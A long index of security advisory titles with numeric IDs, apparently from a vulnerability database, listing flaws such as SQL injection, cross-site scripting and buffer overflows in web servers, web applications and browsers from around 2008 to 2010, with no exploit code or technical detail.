[37924] IBM Lotus Domino Web Access Prior to 229.131 Unspecified Security Vulnerability
[37910] Sun Java System Web Server WebDAV Format String Vulnerability
[37909] Sun Java System Web Server 'admin' Server Denial of Service Vulnerability
[37896] Sun Java System Web Server Digest Authentication Remote Buffer Overflow Vulnerability
[37874] Sun Java System Web Server WebDAV Unspecified Remote Buffer Overflow Vulnerability
[37871] SAP Web Application Server Unspecified Remote Buffer Overflow Vulnerability
[37852] EasySiteNetwork Jokes Complete Website Multiple Cross Site Scripting Vulnerabilities
[37841] Web Server Creator Web Portal Multiple Input Validation Vulnerabilities
[37829] Zeus Web Server 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability
[37825] IBM Lotus Web Content Management Login Page Cross Site Scripting Vulnerability
[37787] HP Web Jetadmin Remote Information Disclosure Vulnerability
[37751] Oracle WebLogic Server CVE-2010-0074 Remote Vulnerability
[37748] Oracle WebLogic Server CVE-2010-0068 Remote WebLogic Server Vulnerability
[37741] Oracle WebLogic Server CVE-2010-0078 Remote WebLogic Server Vulnerability
[37737] Oracle Weblogic Server CVE-2010-0069 Unspecified Remote Vulnerability
[37718] Boa Webserver Terminal Escape Sequence in Logs Command Injection Vulnerability
[37710] Ruby WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability
[37675] IBM Lotus Domino Web Access Multiple Unspecified Security Vulnerabilities
[37654] RoundCube Webmail Cross Site Scripting Vulnerability
[37648] Sun Java System Web Server HTTP 'TRACE' Heap Buffer Overflow Vulnerability
[37641] Sun Java System Web Server Unspecified Remote Code Execution Vulnerability
[37613] LineWeb 1.0.5 Multiple Remote Vulnerabilities
[37581] CARTwebERP Joomla! Component 'controller' Parameter Local File Include Vulnerability
[37513] FreeWebshop 2.2.9 R2 Multiple Remote Vulnerabilities
[37507] Webring 'index.php' Cross Site Scripting Vulnerability
[37484] Proverb Web Calendar Cross Site Scripting and SQL Injection Vulnerabilities
[37480] Joomla! 'com_webcamxp' Component 'Itemid' Parameter Cross-Site Scripting Vulnerability
[37458] Webformatique Car Manager Joomla! Component 'msg' Parameter Cross Site Scripting Vulnerability
[37457] OpenX Administrative Interface Authentication Bypass Vulnerability
[37451] webMathematica 'MSP' Script Cross Site Scripting Vulnerability
[37432] Barracuda Web Application Firewall 660 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities
[37402] eWebquiz 'QuizID' Parameter Multiple SQL Injection Vulnerabilities
[37392] IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
[37376] RETIRED: WHMCS 'weblink_cat_list.php' SQL Injection Vulnerability
[37355] IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
[37352] Cisco WebEx WRF File Handling Multiple Buffer Overflow Vulnerabilities
[37351] Horde Application Framework Administration Interface 'PHP_SELF' Cross-Site Scripting Vulnerability
[37346] WebWorks Help Multiple Cross Site Scripting Vulnerabilities
[37343] HP OpenView Network Node Manager 'ovwebsnmpsrv.exe' Remote Stack Buffer Overflow Vulnerability
[37341] HP OpenView Network Node Manager 'webappmon.exe' Remote Buffer Overflow Vulnerability
[37340] HP OpenView Network Node Manager 'OvWebHelp.exe' Remote Heap Buffer Overflow Vulnerability
[37335] Webmatic Multiple Unspecified SQL Injection and Cross-Site Scripting Vulnerabilities
[37328] RETIRED: IntelliCom NetBiter webSCADA Multiple Default Password Security Bypass Vulnerabilities
[37259] Webmin and Usermin Unspecified Cross-Site Scripting Vulnerability
[37228] iWeb Server URL Directory Traversal Vulnerability
[37159] IBM WebSphere Portal Cross Site Scripting and Unspecified Security Vulnerabilities
[37103] Fuctweb CapCC Plugin for WordPress CAPTCHA Security Bypass Vulnerability
[37089] Opera Web Browser Security Bypass and Unspecified Vulnerabilities
[37078] Opera Web Browser 'dtoa()' Remote Code Execution Vulnerability
[37047] ActiveWebSoftwares Active Bids 'default.asp' SQL Injection Vulnerability
[37015] IBM WebSphere Application Server Administrative Console HTML Injection Vulnerability
[37012] Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability
[37001] HP ProCurve Switch Management Interface Multiple HTML Injection Vulnerabilities
[37000] Drupal Web Services Module Authentication Bypass Vulnerability
[36997] WebKit Preflight Request Same-Origin Policy Bypass Vulnerability
[36996] WebKit Resource Load Callback Information Disclosure Weakness
[36995] WebKit Multiple Remote Code Execution, Denial of Service, and Information Disclosure Vulnerabilities
[36942] Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability
[36933] HP Power Manager Management Web Server Login Remote Code Execution Vulnerability
[36920] Roundcube Webmail Multiple Cross Site Request Forgery Vulnerabilities
[36919] Microsoft Windows Web Services on Devices API Remote Code Execution Vulnerability
[36906] RETIRED: Xerox Fiery WebTools 'summary.php' SQL Injection Vulnerability
[36895] RhinoSoft Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability
[36854] Mozilla Firefox JavaScript Web-Workers Remote Code Execution Vulnerability
[36850] Opera Web Browser prior to 10.01 Multiple Security Vulnerabilities
[36814] RETIRED: Cherokee Web Server Malformed Packet Remote Denial of Service Vulnerability
[36813] Sun Java System Web Server Unspecified Remote Buffer Overflow Vulnerability
[36774] Oracle WebLogic Portal CVE-2009-2002 Remote Unspecified Vulnerability
[36769] Oracle Weblogic Server CVE-2009-3399 Remote WebLogic Server Vulnerability
[36766] Oracle WebLogic Server Administration Console HTML Injection Vulnerability
[36741] Websense Email Security Cross Site Scripting and HTML Injection Vulnerabilities
[36740] Websense Email Security and Email Manager 'STEMWADM.EXE' Remote Denial of Service Vulnerability
[36721] IBM Rational RequisitePro ReqWebHelp Multiple Cross Site Scripting Vulnerabilities
[36714] DWebPro 'file' Parameter Remote Command Execution Vulnerability
[36708] Drupal Webform Module HTML Injection and Information Disclosure Vulnerabilities
[36659] Palm WebOS 'LunaSysMgr' Service Denial of Service Vulnerability
[36618] Microsoft Silverlight and .NET Framework CLR Interface Handling Remote Code Execution Vulnerability
[36607] Palm WebOS Multiple Unspecified Vulnerabilities
[36605] AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities
[36592] Palm WebOS Email Arbitrary Script Injection Vulnerability
[36551] IBM Tivoli Composite Application Manager for WebSphere Unspecified Cross-Site Scripting
[36537] Juniper Networks JUNOS J-Web Multiple Cross Site Scripting And HTML Injection Vulnerabilities
[36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
[36480] MaxWebPortal 'forum.asp' SQL Injection Vulnerability
[36458] IBM WebSphere Application Server Local Information Disclosure Vulnerability
[36457] Xerver Administration Interface 'currentPath' Parameter Cross Site Scripting Vulnerability
[36456] IBM WebSphere Application Server Unspecified Remote Denial Of Service Vulnerability
[36455] IBM WebSphere Application Server Eclipse Help Cross Site Scripting Vulnerability
[36454] Xerver Web Administration Authentication Bypass Vulnerability
[36437] Novell GroupWise WebAccess Cross-Site Scripting Vulnerability
[36400] 3Com Wireless 8760 Dual-Radio 11a/b/g PoE Web Administration Authentication Bypass Vulnerability
[36399] BRS WebWeaver 'Scripts' Security Bypass Vulnerability
[36388] HP StorageWorks Products Remote Management Interface Privilege Escalation Vulnerability
[36373] Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability
[36371] Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability
[36362] Webservice-DIC yoyaku_41 Remote Arbitrary Command Injection Vulnerability
[36310] IBM WebSphere MQ Multiple Vulnerabilities
[36292] IBM Lotus Domino Web Access Cross Site Scripting Vulnerability
[36272] McAfee Email and Web Security Appliance Unspecified Information Disclosure Vulnerability
[36268] LiteSpeed Web Server Multiple Unspecified Remote Security Vulnerabilities
[36256] Ipswitch WhatsUp Gold 'NMWebService.exe' Remote Denial of Service Vulnerability
[36202] Opera Web Browser prior to 10 Multiple Security Vulnerabilities
[36166] TurnkeyForms Web Hosting Directory Login SQL Injection Vulnerability
[36163] IBM WebSphere Application Server 'CSIv2' Security Bypass Vulnerability
[36160] IBM WebSphere Commerce Before 6.0.0.7 Multiple Unspecified Security Vulnerabilities
[36159] IBM WebSphere Application Server SCA Security Bypass Vulnerability
[36158] IBM WebSphere Application Server Single Sign On Security Bypass Vulnerability
[36157] IBM WebSphere Application Server for z/OS File Permission Vulnerability
[36156] IBM WebSphere Application Server Migration Component Trace Information Disclosure Vulnerability
[36155] IBM WebSphere Application Server 'ibm-portlet-ext.xmi' Security Bypass Vulnerability
[36154] IBM Websphere Server Weak Password Obfuscation Denial Of Service Vulnerability
[36153] IBM WebSphere Application Server wsadmin Security Bypass Vulnerability
[36151] IBM WebSphere Commerce Unspecified Information Disclosure Vulnerability
[36091] Squid Web Proxy Cache Authentication Header Parsing Remote Denial of Service Vulnerability
[36058] IBM WebSphere Partner Gateway Console SQL Injection Vulnerability
[36026] WebKit International Domain Name URI Spoofing Vulnerability
[36024] WebKit 'pluginspace' URI Scheme Remote Information Disclosure Vulnerability
[36023] WebKit Floating Point Number Remote Buffer Overflow Vulnerability
[36022] Apple Safari Top Site Feature Website Promotion Security Vulnerability
[35992] Microsoft Office Web Components ActiveX Control Stack Buffer Overflow Code Execution Vulnerability
[35990] Microsoft Office Web Components ActiveX Control Memory Allocation Code Execution Vulnerability
[35953] Drupal Webform Report Module Webform Submission HTML Injection Vulnerability
[35945] Sun JRE/JDK Java Web Start ActiveX Control ATL Remote Code Execution Vulnerability
[35932] Palm WebOS Email Notification System 'FROM' Field Arbitrary Script Code Injection Vulnerability
[35878] TYPO3 Webesse Image Gallery Extension Unspecified SQL Injection Vulnerability
[35877] TYPO3 Webesse E-Card Extension Unspecified Cross Site Scripting Vulnerability
[35871] Miniweb Site Builder Module Multiple Cross Site Scripting Vulnerabilities
[35870] Miniweb Survey Pro Module SQL Injection and Cross Site Scripting Vulnerabilities
[35869] Intesync LLC Miniweb Publisher Module SQL Injection and Cross Site Scripting Vulnerabilities
[35786] Palm WebOS Unspecified URL Processing Denial of Service Vulnerability
[35783] CommuniGate Pro Web Mail URI Parsing HTML Injection Vulnerability
[35741] IBM WebSphere Application Server Stax XMLStreamWrite Security Bypass Vulnerability
[35706] Cisco Unified Contact Center Express CRS Administration Interface Directory Traversal Vulnerability
[35674] Oracle WebLogic Server CVE-2009-1974 Remote Vulnerability
[35673] Oracle Weblogic Server 'console-help.portal' Cross Site Scripting Vulnerability
[35665] Hitachi Web Server Client SSL Certificate Handling Unspecified Vulnerability
[35663] Hitachi Web Server Reverse Proxy Remote Denial of Service Vulnerability
[35642] Microsoft Office Web Components ActiveX Control 'msDataSourceObject()' Code Execution Vulnerability
[35610] IBM WebSphere Application Server JAX-RPC WS-Security Security Bypass Vulnerability
[35607] WebKit Numeric Character References Remote Memory Corruption Vulnerability
[35594] IBM WebSphere Application Server JAX-WS Application Security Bypass Vulnerability
[35592] Citrix XenCenterWeb Multiple Input Validation Vulnerabilities
[35577] Sun Java System Web Server '.jsp' File Information Disclosure Vulnerability
[35571] Opera Web Browser 'javascript:' URI in 'Refresh' Header Cross-Site Scripting Vulnerability
[35537] BIGACE Web CMS 'cmd' Parameter Local File Include Vulnerability
[35530] Pidgin OSCAR Protocol Web Message Denial of Service Vulnerability
[35528] Palm WebOS Prior to 1.0.4 Multiple Vulnerabilities
[35513] Sun Java Web Console Cross Site Scripting Vulnerability
[35490] IBM Rational ClearQuest CQWeb Server Cross Site Scripting and Information Disclosure Vulnerabilities
[35476] Cisco ASA Appliance WebVPN DOM Wrapper Cross Site Scripting Vulnerability
[35475] Cisco Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing Vulnerability
[35441] WebKit 'parent/top' Cross Domain Scripting Vulnerability
[35412] Multiple Browsers Web Proxy Redirect Handling Man In The Middle Vulnerability
[35406] IBM WebSphere Application Server 'IsSecurityEnabled' Flag Information Disclosure Vulnerability
[35405] IBM WebSphere Application Server Multiple Security Vulnerabilities
[35374] Uebimiau Webmail 'admin/editor.php' Arbitrary File Overwrite Vulnerability
[35368] Webmedia Explorer Multiple Cross Site Scripting Vulnerabilities
[35350] WebKit Java Applet Remote Code Execution Vulnerability
[35349] WebKit Web Inspector Page Privilege Cross Domain Scripting Vulnerability
[35348] WebKit Web Inspector Cross Site Scripting Vulnerability
[35340] WebKit Custom Cursor and Adjusting CSS3 Hotspot Properties Browser UI Element Spoofing Vulnerability
[35336] phpWebThings 'fdown.php' SQL Injection Vulnerability
[35334] WebKit SVG Animation Elements Use After Free Remote Code Execution Vulnerability
[35333] WebKit File Enumeration Information Disclosure Vulnerability
[35332] WebKit 'about:blank' Security Bypass Vulnerability
[35331] WebKit 'Canvas' SVG Image Capture Remote Information Disclosure Vulnerability
[35330] WebKit JavaScript Prototypes Cross Site Scripting Vulnerability
[35328] WebKit Frame Transition Cross Domain Scripting Vulnerability
[35327] WebKit 'Location' and 'History' Objects Cross Site Scripting Vulnerability
[35325] WebKit JavaScript DOM Use After Free Remote Code Execution Vulnerability
[35322] WebKit 'Canvas' HTML Element Image Capture Remote Information Disclosure Vulnerability
[35321] WebKit XML External Entity Information Disclosure Vulnerability
[35320] WebKit HTML 5 Standard Method Cross Site Scripting Vulnerability
[35319] WebKit 'document.implementation' Cross Domain Scripting Vulnerability
[35318] WebKit CSS 'Attr' Function Remote Code Execution Vulnerability
[35317] WebKit Subframe Click Jacking Vulnerability
[35315] WebKit JavaScript 'onload()' Event Cross Domain Scripting Vulnerability
[35313] phpWebThings 'module' Parameter Local File Include Vulnerability
[35311] WebKit JavaScript Exception Handling Remote Code Execution Vulnerability
[35310] WebKit 'Attr' DOM Objects Remote Code Execution Vulnerability
[35309] WebKit JavaScript Garbage Collector Memory Corruption Vulnerability
[35284] WebKit 'Document()' Function Remote Information Disclosure Vulnerability
[35283] WebKit XSLT Redirects Remote Information Disclosure Vulnerability
[35272] WebKit Drag Event Remote Information Disclosure Vulnerability
[35271] WebKit DOM Event Handler Remote Memory Corruption Vulnerability
[35270] WebKit 'XMLHttpRequest' HTTP Response Splitting Vulnerability
[35264] Kerio MailServer WebMail Cross Site Scripting Vulnerability
[35232] Microsoft IIS 5.0 WebDAV Authentication Bypass Vulnerability
[35217] Sun GlassFish Enterprise Server HTTP Engine/Admin Interface Local Denial of Service Vulnerability
[35216] Hitachi Web Server Reverse Proxy Denial of Service Vulnerability
[35204] Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting Vulnerability
[35197] Drupal Webform Module HTML Injection Vulnerability
[35170] IBM WebSphere MQ Remote Buffer Overflow Vulnerability
[35142] Linksys WAG54G2 Web Management Console Remote Arbitrary Shell Command Injection Vulnerability
[35136] IBM WebSphere Partner Gateway 'bcgarchive' Information Disclosure Vulnerability
[35105] Ston3D S3DPlayer Web and Standalone 'system.openURL()' Remote Command Injection Vulnerability
[35068] Web Conference Room Free Unspecified Cross Site Scripting Vulnerability
[35066] Novell GroupWise WebAccess Multiple Security Vulnerabilities
[35061] Novell GroupWise WebAccess 'gw/webacc' Multiple Cross-Site Scripting Vulnerabilities
[35053] Profense Web Application Firewall Security Bypass Vulnerabilities
[35047] CGI Rescue Web Mailer HTTP Header Injection Vulnerability
[35043] Realty Web-Base 'list_list.php' Parameter SQL Injection Vulnerability
[35038] Kingsoft Webshield Cross Site Scripting and Remote Command Execution Vulnerability
[35018] Creative Web Solutions Multiple level CMS SQL Injection Vulnerabilities
[35012] ClanWeb 'save.php' Remote Password Change Vulnerability
[34993] Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities
[34984] Xerox WorkCentre Webserver Unspecified Remote Command Execution Vulnerability
[34924] WebKit SVGList Objects Remote Memory Corruption Vulnerability
[34892] TinyWebGallery '/admin/_include/init.php' Local File Include Vulnerability
[34888] RTWebalbum 'AlbumId' Parameter SQL Injection Vulnerability
[34886] Realty Web-Base 'admin/admin.php' Multiple SQL Injection Vulnerabilities
[34862] webSPELL 'getlang.php' SQL Injection Vulnerability
[34809] Million Dollar Text Links Administrative Interface Authentication Bypass Vulnerability
[34772] Baby Web Server URL File Disclosure Vulnerability
[34758] Pablo Software Solutions Quick 'n Easy Web Server Directory Traversal Vulnerability
[34751] WebSPELL 'picture.php' Local File Disclosure Vulnerability
[34721] DWebPro Directory Traversal Vulnerability and Arbitrary File Disclosure Vulnerability
[34687] WebPortal CMS Multiple Remote and Local File Include Vulnerabilities
[34666] FreeBSD libc Berkeley DB Interface Uninitialized Memory Local Information Disclosure Vulnerability
[34622] Web Scribble Solutions webClassifieds Insecure Cookie Authentication Bypass Vulnerability
[34606] Red Hat Stronghold Web Server Cross Site Scripting Vulnerability
[34604] EZ Webitor 'login.php' SQL Injection Vulnerability
[34598] Horde IMP and Groupware Webmail Cached PGP Key Spoofing Vulnerability
[34595] webSPELL BBCode HTML Injection Vulnerability
[34577] eLitius Administrative Interface Authentication Bypass Vulnerability
[34576] WebCollab 'tasks.php' Cross Site Scripting Vulnerability
[34567] WEBBDOMAIN WebShop SQL Injection and Cross Site Scripting Vulnerabilities
[34565] MiniWeb Source Code Information Disclosure Vulnerability
[34563] MiniWeb Remote Buffer Overflow Vulnerability
[34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
[34538] FreeWebShop 'startmodules.inc.php' Local File Include Vulnerability
[34529] @Mail and @Mail WebMail Email Body HTML Injection Vulnerability
[34523] DivX Web Player 'STRF' Chunk Processing Remote Buffer Overflow Vulnerability
[34507] Banshee DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability
[34506] IBM WebSphere Application Server XML Digital Signature Unspecified Security Vulnerability
[34502] IBM WebSphere Application Server 'UsernameToken' Unspecified Security Vulnerability
[34501] IBM WebSphere Application Server Forced Logout Session Hijacking Vulnerability
[34492] Yellow Duck Weblog 'include/languages/check.php' Local File Include Vulnerability
[34473] Chance-i DiViS DVR System Web Server Directory Traversal Vulnerability
[34468] Chance-i DiViS-Web DVR System ActiveX Control 'AddSiteEx()' Buffer Overflow Vulnerability
[34462] WebFileExplorer 'body.asp' SQL Injection Vulnerability
[34391] Web Help Desk Multiple HTML Injection Vulnerabilities
[34358] IBM WebSphere Application Server File Permission Vulnerability
[34349] Asbru Web Content Management SQL Injection and Cross Site Scripting Vulnerabilities
[34330] IBM WebSphere Application Server Username Token Option Session Hijacking Vulnerability
[34327] QtWeb Browser Malformed HTML File Remote Denial of Service Vulnerability
[34323] webEdition CMS 'WE_LANGUAGE' Parameter Local File Include Vulnerability
[34319] SAP MaxDB 'webdbm' Multiple Cross Site Scripting Vulnerabilities
[34311] Hitachi Groupmax World Wide Web Desktop Multiple Unauthorized Access Vulnerabilities
[34310] SAP AG SAPgui EAI WebViewer3D ActiveX Control Stack Buffer Overflow Vulnerability
[34307] Cisco ASA Appliance WebVPN Cross Site Scripting Vulnerability
[34286] RETIRED: Check Point FireWall-1 PKI Web Service Remote Buffer Overflow Vulnerabilities
[34259] IBM WebSphere Application Server for z/OS Multiple Vulnerabilities
[34254] WeBid 'upldgallery.php' Arbitrary File Upload Vulnerability
[34239] Cisco IOS WebVPN/SSLVPN Multiple Denial of Service Vulnerabilities
[34206] WebCit Mini_Calendar Component Format String Vulnerability
[34116] Kim Websites 'login.php' SQL Injection Vulnerability
[34104] IBM WebSphere Application Server WAR File Information Disclosure Vulnerability
[34074] WeBid 'include_path' Parameter Multiple Remote File Include Vulnerabilities
[34066] Multiple Aryanic Products 'includes/web_search.aspx' Cross Site Scripting Vulnerability
[34058] WEBJump! Multiple SQL Injection Vulnerabilities
[34033] Belkin Bulldog Plus Web Service Buffer Overflow Vulnerability
[34016] Amoot Web Directory Password Field SQL Injection Vulnerability
[34001] IBM WebSphere Application Server Administrative Console Cross Site Scripting Vulnerability
[33979] Easy Web Password '.ewp' File Buffer Overflow Vulnerability
[33978] Webformatique Car Manager Joomla! Component 'ItemID' Parameter SQL Injection Vulnerability
[33976] Webformatique Reservation Manager Joomla! Component 'ItemID' Parameter SQL Injection Vulnerability
[33973] Easy File Sharing Web Server 'thumbnail.php' File Disclosure Vulnerability
[33961] Opera Web Browser prior to 9.64 Multiple Security Vulnerabilities
[33944] Yektaweb Academic Web Tools CMS Multiple Cross Site Scripting Vulnerabilities
[33915] Cisco Unified MeetingPlace Web Conferencing 'E-Mail Address' Field HTML Injection Vulnerability
[33905] IBM WebSphere Application Server Cluster Configuration File Information Disclosure Vulnerability
[33901] Cisco Unified MeetingPlace Web Conferencing Authentication Bypass Vulnerability
[33899] ZNC Webadmin Module Remote Privilege Escalation Vulnerability
[33884] IBM WebSphere Application z/OS CSLv2 Identity Assertion Unspecified Local Vulnerability
[33879] IBM WebSphere Application Server WSPolicy Information Disclosure Vulnerability
[33857] IBM WebSphere MQ Queue Manager Multiple Local Privilege Escalation Vulnerabilities
[33849] IBM WebSphere Application Server Installation Factory Information Disclosure Vulnerability
[33839] IBM WebSphere Partner Gateway RNIF Document Security Bypass Vulnerability
[33838] GoAhead WebServer Authentication Bypass and Multiple Denial of Service Vulnerabilities
[33832] Fujitsu Jasmine2000 Enterprise Edition WebLink HTTP Response Splitting Vulnerability
[33819] IBM WebSphere Message Broker Information Disclosure Vulnerability
[33804] WebKit XMLHttpRequest Cookie Information Disclosure Vulnerability
[33746] Scripts Den Dating Website Script 'searchmatch.php' SQL Injection Vulnerability
[33705] SnippetMaster Webpage Editor Cross Site Scripting and Remote File Include Vulnerabilities
[33701] WebFrame Local and Remote File Include Vulnerabilities
[33700] IBM WebSphere Application Server Multiple Vulnerabilities
[33687] Trend Micro Interscan Web Security HTTP Proxy Authentication Information Disclosure Vulnerability
[33679] Trend Micro InterScan Web Security Suite Multiple Security Bypass Vulnerabilities
[33677] FotoWeb Multiple Cross Site Scripting Vulnerabilities
[33663] BlackBerry Application Web Loader ActiveX Control Remote Buffer Overflow Vulnerability
[33604] Squid Web Proxy Cache HTTP Version Number Parsing Denial of Service Vulnerability
[33590] WEBalbum 'photo.php' SQL Injection Vulnerability
[33585] NaviCOPA Web Server Remote Buffer Overflow and Source Code Information Disclosure Vulnerabilities
[33542] PHP 'mbstring.func_overload' Webserver Denial Of Service Vulnerability
[33541] Novell GroupWise WebAccess 'gw/webacc' Multiple Cross-Site Scripting Vulnerabilities
[33537] Novell GroupWise WebAccess Unspecified HTML Injection Vulnerability
[33533] IBM WebSphere Application Server Arbitrary File Information Disclosure Vulnerability
[33531] Xerox WorkCentre Webserver Unspecified Remote Command Execution Vulnerability
[33515] Web on Windows ActiveX 'WriteIniFileString/ShellExecute' Arbitrary File Overwrite Vulnerability
[33492] Horde IMP Webmail Client Cross Site Scripting And HTML Injection Vulnerabilities
[33476] Flaxweb Article Manager Avatar Arbitrary File Upload Vulnerability
[33465] SAP NetWeaver and Web Dynpro Portal Cross-Site Scripting Vulnerability
[33429] MacsDesign Studio Web Help Desk Cross Site Scripting Vulnerability
[33423] Ewebb Web-Calendar Lite Multiple SQL Injection Vulnerabilities
[33422] Flaxweb Article Manager 'category.php' SQL Injection Vulnerability
[33372] Roundcube Webmail Background Attributes Email Message HTML Injection Vulnerability
[33343] WebSVN Known Path Access Restriction Security Bypass Vulnerability
[33341] 53KF Web IM 'msg' Parameter Cross Site Scripting Vulnerability
[33314] DMXReady Blog Manager 'inc_weblogmanager.asp' Cross-Site Scripting and SQL Injection Vulnerabilities
[33243] Multiple Office OCX ActiveX Controls 'OpenWebFile()' Arbitrary Program Execution Vulnerability
[33215] Git gitweb Unspecified Remote Command Execution Vulnerability
[33169] IBM WebSphere DataPower XML Security Gateway XS40 Remote Denial Of Service Vulnerability
[33107] webSPELL Multiple SQL Injection Vulnerabilities
[33106] plxWebDev plx Autoreminder 'members.php' SQL Injection Vulnerability
[33084] ASPThai.Net Webboard 'bview.asp' SQL Injection Vulnerability
[33080] Apple Safari WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability
[33069] Pixel8 Web Photo Album 'Photo.asp' SQL Injection Vulnerability
[33053] SaschArt SasCam Webcam Server ActiveX Control 'Get' Method Buffer Overflow Vulnerability
[33033] AlstraSoft Web Email Script Enterprise 'id' Parameter SQL Injection Vulnerability
[33028] Web Scribble Solutions webClassifieds Multiple SQL Injection Vulnerabilities
[33016] SapporoWorks BlackJumboDog Web Server Unspecified Authentication Bypass Vulnerability
[32982] TYPO3 WEBERkommunal Facilities Extension Unspecified SQL Injection Vulnerability
[32969] Merak Mail Server and Webmail Email Message HTML Injection Vulnerability
[32967] Git gitweb 'diff.external' Local Privilege Escalation Vulnerability
[32936] Extract Website 'download.php' Local File Include Vulnerability
[32928] webcamXP URL Directory Traversal Vulnerability
[32927] Fujitsu-Siemens WebTransactions Unspecified Remote Command Execution Vulnerability
[32915] Phpclanwebsite Multiple Input Validation Vulnerabilities
[32908] EasySiteNetwork Jokes Complete Website 'joke.php' SQL Injection Vulnerability
[32892] Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability
[32891] Opera Web Browser HTML Parsing Heap-Based Remote Code Execution Vulnerability
[32864] Opera Web Browser prior to 9.63 Multiple Security Vulnerabilities
[32863] Kerio MailServer WebMail Multiple Cross Site Scripting Vulnerabilities
[32829] WebPhotoPro Multiple SQL Injection Vulnerabilities
[32823] CMS ISWEB SQL Injection and Cross Site Scripting Vulnerabilities
[32819] RETIRED: Intesync LLC Miniweb 2.0 'username' Parameter SQL Injection Vulnerability
[32792] IBM WebSphere Portal and Workplace Web Content Management Unspecified Security Bypass Vulnerability
[32771] Sun Java Web Console Unspecified URI Redirection Vulnerability
[32770] Sun Java System Portal Server Web Console Information Disclosure Vulnerability
[32756] unscripts UN Webmaster Marketplace 'member.php' SQL Injection Vulnerability
[32704] WebCAF Multiple Input Validation Vulnerabilities
[32679] IBM WebSphere Application Server Multiple Unspecified Vulnerabilities
[32665] Linksys WVC54GC 'NetCamPlayerWeb11gv2.ocx' ActiveX Control Buffer Overflow Vulnerability
[32635] PHPSTREET Webboard 'show.php' SQL Injection Vulnerability
[32620] Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities
[32616] Rae Media Web Based Contact Management Login SQL Injection Vulnerability
[32602] WebGUI 'lib/WebGUI/Storage.pm' Remote Script Code Execution Vulnerability
[32576] IBM Rational ClearQuest Web Multiple Unspecified Cross Site Scripting Vulnerabilities
[32570] PHP JOBWEBSITE PRO 'forgot.php' SQL Injection and Cross Site Scripting Vulnerabilities
[32551] ActiveWebSoftwares Active Business Directory 'default.asp' SQL Injection Vulnerability
[32550] ActiveWebSoftwares Active Price Comparison 'links.asp' SQL Injection Vulnerability
[32548] ActiveWebSoftwares Active Web Helpdesk 'default.asp' SQL Injection Vulnerability
[32547] ActiveWebSoftwares Active Test Multiple SQL Injection Vulnerabilities
[32546] ActiveWebSoftwares Active Web Mail Multiple SQL Injection Vulnerabilities
[32544] ActiveWebSoftwares Active Bids 'bidhistory.asp' SQL Injection Vulnerability
[32541] ActiveWebSoftwares ActiveVotes 'VoteHistory.asp' SQL Injection Vulnerability
[32534] ActiveWebSoftwares ASPReferral 'Merchantsadd.asp' SQL Injection Vulnerability
[32533] Multiple ActiveWebSoftwares Products Login Parameters SQL Injection Vulnerabilities
[32520] Web Calendar System SQL Injection and Cross Site Scripting Vulnerabilities
[32515] Livio.net WEB Calendar Cross Site Scripting and Multiple SQL Injection Vulnerabilities
[32507] Web Calendar Pro 'admin.php' SQL Injection Vulnerability
[32473] RSA enVision Platform Web Console Password Hash Remote Information Disclosure Vulnerability
[32454] Bandwebsite 'info.php' Cross Site Scripting Vulnerability
[32453] Bandwebsite 'lyrics.php' SQL Injection Vulnerability
[32449] Multiple BDigital Web Solutions Applications 'pageid' Parameter SQL Injection Vulnerability
[32412] Apple iPhone Configuration Web Utility for Windows Directory Traversal Vulnerability
[32408] IBM Lotus Web Content Management Unspecified Cross Site Scripting Vulnerabilities
[32323] Opera Web Browser 'file://' Heap Based Buffer Overflow Vulnerability
[32301] AlstraSoft Web Hosting Directory Multiple Vulnerabilities
[32299] Bankoi Webhost Panel 'login.asp' SQL Injection Vulnerability
[32298] AlstraSoft Web Host Directory 'Password' Parameter SQL Injection Vulnerability
[32290] NETGEAR WGR614 Administration Interface Remote Denial of Service Vulnerability
[32287] pi3Web ISAPI Directory Remote Denial Of Service Vulnerability
[32283] TurnkeyForms Web Hosting Directory Multiple Vulnerabilities
[32278] HyperStop WebHost Directory 'admin/login' SQL Injection Vulnerability
[32196] Mini Web Calendar Local File Include and Cross-Site Scripting Vulnerabilities
[32108] Multiple WEBBDOMAIN Products Login Screen SQL Injection Vulnerability
[32097] WEBBDOMAIN Post Card 'choosecard.php' SQL Injection Vulnerability
[32092] Multi Languages WebShop Online Cross-Site Scripting and SQL Injection Vulnerabilities
[32032] Scripts For Sites EZ Webring/EZ Top Sites 'category.php' SQL Injection Vulnerability
[32015] Opera Web Browser 9.62 History Search Input Validation Vulnerability
[32011] phpWebSite 'links.php' SQL Injection Vulnerability
[31991] Opera Web Browser History Search and Links Panel Cross Site Scripting Vulnerabilities
[31977] WebCards 'admin.php' Login Page SQL Injection Vulnerability
[31963] H&H Solutions WebSoccer 'id' SQL Injection Vulnerability
[31947] WebGUI 'Asset.pm' Perl Module Handling Code Execution Vulnerability
[31946] Android Web Browser Unspecified Remote Code Execution Vulnerability
[31931] Blender 'BPY_interface.c' Remote Command Execution Vulnerability
[31916] Sun Java Web Start Remote Command Execution Vulnerability
[31891] WebSVN Multiple Remote Input Validation Vulnerabilities
[31869] Opera Web Browser History Search Input Validation Vulnerability
[31855] Multiple Vendor Web Browser FTP Client Cross Site Scripting Weakness
[31842] Opera Web Browser Multiple Cross Site Scripting Vulnerabilities
[31839] IBM WebSphere Application Server Denial of Service And Security Bypass Vulnerabilities
[31810] myWebland miniBloggie 'del.php' SQL Injection Vulnerability
[31797] WebGUI Security Bypass and Multiple Cross Site Scripting Vulnerabilities
